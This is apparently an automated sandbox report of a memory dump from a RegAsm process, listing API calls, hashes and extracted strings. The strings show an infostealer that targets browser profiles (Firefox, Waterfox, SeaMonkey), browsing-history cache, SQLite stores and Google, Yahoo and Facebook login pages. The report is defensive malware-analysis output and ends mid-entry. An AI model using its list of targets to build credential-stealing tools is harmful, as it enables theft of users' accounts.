                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                          • API String ID: 3883404497-2982631422
                                                          • Opcode ID: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                          • Opcode Fuzzy Hash: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                            • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                          • memset.MSVCRT ref: 0040BC75
                                                          • memset.MSVCRT ref: 0040BC8C
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                          • memcmp.MSVCRT ref: 0040BCD6
                                                          • memcpy.MSVCRT ref: 0040BD2B
                                                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                          • String ID:
                                                          • API String ID: 115830560-3916222277
                                                          • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                          • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                          • String ID: r!A
                                                          • API String ID: 2791114272-628097481
                                                          • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                          • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                            • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                          • _wcslwr.MSVCRT ref: 0040C817
                                                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                          • wcslen.MSVCRT ref: 0040C82C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                          • API String ID: 62308376-4196376884
                                                          • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                          • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 770 40b58d-40b59e 771 40b5a4-40b5c0 GetModuleHandleW FindResourceW 770->771 772 40b62e-40b632 770->772 773 40b5c2-40b5ce LoadResource 771->773 774 40b5e7 771->774 773->774 775 40b5d0-40b5e5 SizeofResource LockResource 773->775 776 40b5e9-40b5eb 774->776 775->776 776->772 777 40b5ed-40b5ef 776->777 777->772 778 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 777->778 778->772
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                          • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                          • memcpy.MSVCRT ref: 0040B60D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                          • String ID: BIN
                                                          • API String ID: 1668488027-1015027815
                                                          • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                          • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                          • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                          • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED

                                                          Control-flow Graph

                                                          APIs
                                                          • memset.MSVCRT ref: 00403CBF
                                                          • memset.MSVCRT ref: 00403CD4
                                                          • memset.MSVCRT ref: 00403CE9
                                                          • memset.MSVCRT ref: 00403CFE
                                                          • memset.MSVCRT ref: 00403D13
                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                          • memset.MSVCRT ref: 00403DDA
                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                          • String ID: Waterfox$Waterfox\Profiles
                                                          • API String ID: 4039892925-11920434
                                                          • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                          • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                          • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                          • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA

                                                          Control-flow Graph

                                                          APIs
                                                          • memset.MSVCRT ref: 00403E50
                                                          • memset.MSVCRT ref: 00403E65
                                                          • memset.MSVCRT ref: 00403E7A
                                                          • memset.MSVCRT ref: 00403E8F
                                                          • memset.MSVCRT ref: 00403EA4
                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                          • memset.MSVCRT ref: 00403F6B
                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                          • API String ID: 4039892925-2068335096
                                                          • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                          • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                          APIs
                                                          • memset.MSVCRT ref: 00403FE1
                                                          • memset.MSVCRT ref: 00403FF6
                                                          • memset.MSVCRT ref: 0040400B
                                                          • memset.MSVCRT ref: 00404020
                                                          • memset.MSVCRT ref: 00404035
                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                          • memset.MSVCRT ref: 004040FC
                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                          • API String ID: 4039892925-3369679110
                                                          • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                          • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                          • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                          • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                          • API String ID: 3510742995-2641926074
                                                          • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                          • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                          • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                          • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                          • GetLastError.KERNEL32 ref: 0041847E
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@CreateErrorFileLast
                                                          • String ID: |A
                                                          • API String ID: 4200628931-1717621600
                                                          • Opcode ID: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                          • Opcode Fuzzy Hash: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                          APIs
                                                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                          • memset.MSVCRT ref: 004033B7
                                                          • memcpy.MSVCRT ref: 004033D0
                                                          • wcscmp.MSVCRT ref: 004033FC
                                                          • _wcsicmp.MSVCRT ref: 00403439
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                          • String ID: $0.@
                                                          • API String ID: 3030842498-1896041820
                                                          • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                          • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                          • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                          • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                          APIs
                                                          • memset.MSVCRT ref: 00403C09
                                                          • memset.MSVCRT ref: 00403C1E
                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                          • wcscat.MSVCRT ref: 00403C47
                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                          • wcscat.MSVCRT ref: 00403C70
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                          • API String ID: 1534475566-1174173950
                                                          • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                          • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                          • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                          • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                          • String ID:
                                                          • API String ID: 669240632-0
                                                          • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                          • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                          • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                          • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                          APIs
                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                          • memset.MSVCRT ref: 00414C87
                                                          • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                          • wcscpy.MSVCRT ref: 00414CFC
                                                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                          • API String ID: 2925649097-2036018995
                                                          • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                          • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                          APIs
                                                          • wcschr.MSVCRT ref: 00414458
                                                          • _snwprintf.MSVCRT ref: 0041447D
                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                          • String ID: "%s"
                                                          • API String ID: 1343145685-3297466227
                                                          • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                          • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                          • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                          • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                          APIs
                                                          • memset.MSVCRT ref: 004087D6
                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                          • memset.MSVCRT ref: 00408828
                                                          • memset.MSVCRT ref: 00408840
                                                          • memset.MSVCRT ref: 00408858
                                                          • memset.MSVCRT ref: 00408870
                                                          • memset.MSVCRT ref: 00408888
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                          • String ID:
                                                          • API String ID: 2911713577-0
                                                          • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                          • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                          • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                          • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcmp
                                                          • String ID: @ $SQLite format 3
                                                          • API String ID: 1475443563-3708268960
                                                          • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                          • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                          • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                          • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _wcsicmpqsort
                                                          • String ID: /nosort$/sort
                                                          • API String ID: 1579243037-1578091866
                                                          • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                          • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                          • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                          • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                          • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
